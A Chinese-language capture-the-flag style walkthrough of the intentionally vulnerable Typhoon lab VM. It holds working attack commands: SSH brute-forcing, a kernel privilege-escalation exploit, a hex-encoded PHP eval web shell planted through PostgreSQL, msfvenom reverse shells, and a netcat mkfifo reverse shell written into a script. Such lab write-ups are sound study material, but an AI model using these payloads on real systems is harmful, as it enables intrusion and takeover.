Typhoon靶机
仅供个人娱乐
靶机信息
靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/
一、主机探测
arp-scan -l
![](https://upload-images.jianshu.io/upload_images/4664072-a78d3b650ec3fd07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nmap -sV -p- -A 192.168.181.136
![](https://upload-images.jianshu.io/upload_images/4664072-aa54da95479fa315.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
扫描之后发现目标开放了很多的端口比如21(ftp),22(ssh),25(smtp),53(dns),80(http),…2049(nfs-acl),3306(mysql),5432(postgresql),6379(redis),8080(http),27017(mongodb)等。
二、漏洞扫描
21端口(ftp)
nmap扫描结果为可以匿名访问
在浏览器访问,发现什么都没有
![](https://upload-images.jianshu.io/upload_images/4664072-e54429b8d6d54c32.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
22端口(ssh)
首先开始是想什么呢,ssh连接需要账号密码的,发现靶机名字为typhoon就想着去测试一下看看账号存不存在,利用ssh用户枚举漏洞进行测试
发现端口22开放,其版本为openssh 6.6.1p1,利用OpenSSH新爆出的CVE爆出目标主机的用户,这对特定的用户爆破密码,建议爆破1000条。先用searchsploit查找OpenSSH 6.6.1p1出现的漏洞,找到两个用户名枚举漏洞.
searchsploit openssh
![](https://upload-images.jianshu.io/upload_images/4664072-a2e3b52c2bf297d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
利用msf进行账号枚举。这里的用户名字典我采用:
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-user-passwd/names/namelist.txt
![](https://upload-images.jianshu.io/upload_images/4664072-d06d699320d8a963.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
设置数据
![](https://upload-images.jianshu.io/upload_images/4664072-6e9d5ab9a97e24d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
结果显示
![](https://upload-images.jianshu.io/upload_images/4664072-d6cb97b32f0bd581.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
结果用户存在,于是去想着爆破一下密码,看看是否为弱密码。
hydra -l typhoon -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.181.136
![](https://upload-images.jianshu.io/upload_images/4664072-ad4f83493a3b31e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
username: typhoonpassword: 789456123
登录测试
ssh typhoon@192.168.181.136
![](https://upload-images.jianshu.io/upload_images/4664072-2878152666212fde.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
25端口(smtp)
发现开放25端口,版本为Postfix smtpd
searchsploit postfix
![](https://upload-images.jianshu.io/upload_images/4664072-437c90c9fe78ada6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用smtp-user-enum枚举用户名
search smtp
use 5
![](https://upload-images.jianshu.io/upload_images/4664072-65fa1aac15f71da5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
设置参数
![](https://upload-images.jianshu.io/upload_images/4664072-25da31d59d16ee34.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
53端口(DNS ISC BIND9.9.5-3)
查看是否存在漏洞,发现dns版本存在拒绝服务漏洞
Searchsploit isc bind
![](https://upload-images.jianshu.io/upload_images/4664072-11e27f01162c3499.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
80端口(http)
访问80端口http://192.168.181.136:80
![](https://upload-images.jianshu.io/upload_images/4664072-63bb261f9984d525.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
访问:http://192.168.1.104/robots.txt发现有个/monoadmin/目录,访问http://192.168.181.136/mongoadmin
![](https://upload-images.jianshu.io/upload_images/4664072-4df9cebe1f60c793.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7f2cc92fe95c9d47.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
然后下面有两个链接点击creds,会发现一个账号密码,跟ssh爆破一样的。
![](https://upload-images.jianshu.io/upload_images/4664072-042a76200759fa07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
username: typhoon
password: 789456123
再次使用ssh连接
![](https://upload-images.jianshu.io/upload_images/4664072-9e23dae231b343fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
漏洞提权一、
searchsploit linux 3.13.0
![](https://upload-images.jianshu.io/upload_images/4664072-60cf083affae015f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
然后将利用exp复制到/opt目录下
cp /usr/share/exploitdb/exploits/linux/local/37292.c /opt
使用python搭建小型http服务器,以提供利用exp下载
python -m SimpleHTTPServer 81
![](https://upload-images.jianshu.io/upload_images/4664072-6c97222f6ebaf87c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将37292.c移动到桌面
使用wget命令将该利用exp从kali主机下载到到目标主机tmp目录。(只有tmp目录具有写入文件的权限)
cd /tmp
wget http://192.168.181.128/37292.c
![](https://upload-images.jianshu.io/upload_images/4664072-1f2d0060cf17896f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
利用漏洞
![](https://upload-images.jianshu.io/upload_images/4664072-72c834f1aa3cffa8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
为了方便shell,使用python进行shell交互
python -c 'import pty; pty.spawn("/bin/bash")'
falg:
进入root目录然后读取flag信息
![](https://upload-images.jianshu.io/upload_images/4664072-9dc29ab564791605.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
漏洞提权二、
发现目标为ubuntu 14.04,去exploit-db搜索这个内核漏洞,然后下载
poc地址:https://www.exploit-db.com/exploits/37292
![](https://upload-images.jianshu.io/upload_images/4664072-46d0eef37c644db6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f68827da03129ed3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
下载之后是一个.c文件,需要编译,把它上传到靶机编译运行
改名为123.c 放置于/root
scp /root/123.c typhoon@192.168.181.136:/tmp
ls
gcc 123.c -o 123
ls
./123
成功提权
111端口(nfs,rpcbind)
search nfs
use 1
![](https://upload-images.jianshu.io/upload_images/4664072-b5ed75a03b7a70f0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
设置参数以及结果
![](https://upload-images.jianshu.io/upload_images/4664072-d1086a84e12381e1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
445端口
发现目标开放了445端口,使用enum4linux枚举目标共享信息
enum4linux ip
扫描结果发现允许空账户、空密码登录,共享文件typhoon
![](https://upload-images.jianshu.io/upload_images/4664072-fcc666455c451260.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-600a24a8ae4dc448.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
远程挂载
mount -t cifs -o username='123',password='' //192.168.181.136/typhoon /mnt
cd /mnt
ls
![](https://upload-images.jianshu.io/upload_images/4664072-3f8f3ae8073fd026.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5432端口(postgresql数据库)
第一步msf模块测试一下
search postgresql
use 5或者use auxiliary/scanner/postgres/postgres_login
set rhosts 192.168.181.136exploit
![](https://upload-images.jianshu.io/upload_images/4664072-9bbfbfcd379a6d0e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
结果显示
![](https://upload-images.jianshu.io/upload_images/4664072-586d152878cfb270.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
发现账号密码username: postgrespassword: postgres
登录psql数据库
psql -h 192.168.181.136 -U postgres
![](https://upload-images.jianshu.io/upload_images/4664072-bbfdd7b41122f426.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
读取文件
读取权限允许的文件
select pg_read_file('postgresql.conf',0,1000);
![](https://upload-images.jianshu.io/upload_images/4664072-6ee721df8e70d8f8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
建表,并使用copy从文件写入数据到表
DROP TABLE if EXISTS hua; 删除hua的表
CREATE TABLE hua(t TEXT); 创建hua的表
COPY hua FROM '/etc/passwd';复制passwd到hua表
SELECT * FROM hua limit 1 offset 0; 查看第一行
![](https://upload-images.jianshu.io/upload_images/4664072-6db26b0c6fb517f9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
直接读出全部数据
SELECT * FROM hua;
![](https://upload-images.jianshu.io/upload_images/4664072-b79bbd109a6ccd1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
利用数据库写文件
INSERT INTO hua(t) VALUES ('hello,hua');赋值hello
COPY hua(t) TO '/tmp/hua'; 复制到/tmp/hua
SELECT * FROM hua; 查看
![](https://upload-images.jianshu.io/upload_images/4664072-dff3aad649b87aee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
数据库导入木马
Msf shell
接下来就可以利用“大对象” 数据写入法
SELECT lo_create(6666); 创建OID
delete from pg_largeobject where loid=6666; 清空内容
![](https://upload-images.jianshu.io/upload_images/4664072-521000ee5aac3a69.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
接下来向”大对象”数据写入数据(木马),使用hex:
在写数据之前,先生成一个木马
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.181.128 lport=6666 R > /root/1.php
![](https://upload-images.jianshu.io/upload_images/4664072-2a9473bfcbe2181f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
打开这个shell.php复制转换成16进制
![](https://upload-images.jianshu.io/upload_images/4664072-05aed603a094ba02.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
insert into pg_largeobject (loid,pageno,data) values(6666, 0, decode('.....', 'hex'));
......为脚本文件
![](https://upload-images.jianshu.io/upload_images/4664072-7ecc9c0ccdfebf2b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
文件太大失败
使用自己的反弹shell脚本 改为16进制
![](https://upload-images.jianshu.io/upload_images/4664072-93660e7a273c45a5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
导出数据到指定文件:
SELECT lo_export(6666, '/var/www/html/shell.php');//默认导出到安装根目录 也可以带路径自由目录写shell
![](https://upload-images.jianshu.io/upload_images/4664072-1d6421e3a35cbb21.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
接下来就是访问了(先msf开启监听,然后http://192.168.181.136/shell.php)
Msfconsole
Search handler
Use 26或者 use exploit/multi/handler
![](https://upload-images.jianshu.io/upload_images/4664072-6b2b99555abc5d56.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
小马菜刀
或者使用一句话木马加密hex
3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
上传木马
insert into pg_largeobject (loid,pageno,data) values(6666, 0, decode('3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E', 'hex'));
导出数据到指定文件:
SELECT lo_export(6666, '/var/www/html/1.php');
![](https://upload-images.jianshu.io/upload_images/4664072-6bae51360cd3d120.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
菜刀连接
![](https://upload-images.jianshu.io/upload_images/4664072-96fb0606bb286371.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6379端口(redis)
Redis未经授权访问漏洞利用,连接redis
![](https://upload-images.jianshu.io/upload_images/4664072-6bbd28e594ac0434.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
这个漏洞有三种方法利用1.利用redis写webshell2.利用”公私钥”认证获取root权限3.利用crontab反弹shell这三种方法都能可以,但就是利用不了,原因是那些文件都没有更高的执行权限,所以导致都导致利用不了
Redis未授权访问漏洞复现与利用
https://www.cnblogs.com/bmjoker/p/9548962.html
8080端口(Tomcat)
浏览器访问http://192.168.181.136:8080
![](https://upload-images.jianshu.io/upload_images/4664072-8b2f7c6f9e8c739e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
发现需要登录
于是想用msf测试存在账号密码
Msfconsole
Search tomcat
Use 7
![](https://upload-images.jianshu.io/upload_images/4664072-95488348f3b8314d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
结果显示
![](https://upload-images.jianshu.io/upload_images/4664072-e9a92bb4f32098e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
等到账号密码username: tomcatpassword: tomcat
![](https://upload-images.jianshu.io/upload_images/4664072-99c0f302dd1fa00b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查找漏洞
![](https://upload-images.jianshu.io/upload_images/4664072-b6d1a581e7bd623f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
利用mgr_upload漏洞
Search tomcat
use 16
设置参数
![](https://upload-images.jianshu.io/upload_images/4664072-97882ce551637bb3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Shell
python -c 'import pty;pty.spawn("/bin/bash")'进行交互
![](https://upload-images.jianshu.io/upload_images/4664072-63d875cb0e3dfdfe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
最后再tab文件里发现一个.sh文件具有高的执行权限,就想着往里面写代码进行再次提权.
![](https://upload-images.jianshu.io/upload_images/4664072-cc1bd12d13de126d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
这时需要msfvenom创建bash代码
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.181.128 lport=5555 R
![](https://upload-images.jianshu.io/upload_images/4664072-8030d27f2851e550.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将生成的恶意代码添加到script.sh文件中
echo "mkfifo /tmp/qadshdh; nc 192.168.181.128 5555 0</tmp/qadshdh | /bin/sh >/tmp/qadshdh 2>&1; rm /tmp/qadshdh" > script.sh
![](https://upload-images.jianshu.io/upload_images/4664072-4ae14809a4497e91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
运行./script.sh之前开启监听
![](https://upload-images.jianshu.io/upload_images/4664072-2f65728b23505693.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c 'import pty;pty.spawn("/bin/bash")'进行交互
Tomcat的后台管理获取shell
通过google可知默认的tomcat后台目录为/manager/html,用户名:tomcat,密码:tomcat
http://192.168.181.136:8080//manager/html
![](https://upload-images.jianshu.io/upload_images/4664072-b2fefbe0bdeb4731.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
我们可以msfvenom来生WAR文件
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.181.128 LPORT=4444 -f war -o evil.war
![](https://upload-images.jianshu.io/upload_images/4664072-55e6f70bd86cac5b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
可以看到evulll.war具体内容:
7z l evil.war
![](https://upload-images.jianshu.io/upload_images/4664072-782c8e9ba6f9b71f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
后台上传文件
要访问恶意Web应用程序,请在浏览器的地址栏中输入以下内容:
http://192.168.181.136:8080/evil/tudvpurwgjh.jsp
http://192.168.181.136:8080/evil.war
同是也可以上传大马war包
本地监听NC可反弹
![](https://upload-images.jianshu.io/upload_images/4664072-874638338de4524a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
同是也可以上传大马war包
dirb 扫描
在dirb扫描中有cms,durpal,phpmyadmin等
![](https://upload-images.jianshu.io/upload_images/4664072-1c5cca1d17e4e188.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-893e1336c5ddf62b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Lotus CMS
访问cms:http://192.168.181.136/cms
![](https://upload-images.jianshu.io/upload_images/4664072-d37b853c79a34e21.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
然后我搜索了此CMS登录的默认凭据,我发现此CMS容易受到eval()函数中存在的一个远程执行代码漏洞的攻击。
利用msf的lotus cms模块
Msfconsole
Search lotus
Use 9或者use exploit/multi/http/lcms_php_exec
![](https://upload-images.jianshu.io/upload_images/4664072-520033ec17e6b9c4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
设置参数
![](https://upload-images.jianshu.io/upload_images/4664072-3b3a5c80ac0059e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
结果显示
![](https://upload-images.jianshu.io/upload_images/4664072-073e5a09865a532b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Drupal CMS
访问drupal:http://192.168.181.136/drupal
![](https://upload-images.jianshu.io/upload_images/4664072-8283d7cb23a27a74.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
再次使用msf的durpal cms模块
Search durpal
use 4或者use exploit/unix/webapp/drupal_drupalgeddon2
设置参数
![](https://upload-images.jianshu.io/upload_images/4664072-d97379c225990207.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
结果显示
![](https://upload-images.jianshu.io/upload_images/4664072-6b73eeafbae395c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
others
在dvwa文件的config配置文件中发现了phpmyadmin数据库的账号密码了
username: root
password: toor
访问登录:http://192.168.181.136/phpmyadmin
![](https://upload-images.jianshu.io/upload_images/4664072-b75efe273e68f440.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
进去之后发现得到一些账号密码,结果发现是在靶机了搭建了两个web测试平台